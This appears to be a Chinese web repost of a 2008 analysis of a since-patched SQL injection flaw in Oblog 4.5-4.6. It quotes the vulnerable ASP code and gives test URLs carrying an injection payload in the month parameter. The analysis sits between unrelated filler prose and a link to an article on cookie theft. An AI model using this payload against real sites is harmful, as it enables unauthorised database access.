断断续续的烟雨给江南披上了一件白色的纱衣,这件飘若浮云,清净如水的嫁纱,迷蒙了往昔,模糊了过去。我开始在其中憧憬,永远的置身于这种氛围中,让世俗的纠缠远离。
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.
以上就是Oblog最新注入漏洞分析(已修补) 。这个世界上有很多失败的人,他们失败的主要原因就是不懂得如何做出选择,他们不明白什么才能够让自己的能力的到施展。所以成功的人,总是选择最好的条件和环境发挥自己的潜能,获得最后的成功。更多关于Oblog最新注入漏洞分析(已修补) 请关注haodaima.com其它相关文章!
![新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏如何利用]](https://cdnss.haodaima.top/uploadfile/2024/0306/20240306103542832.jpg)
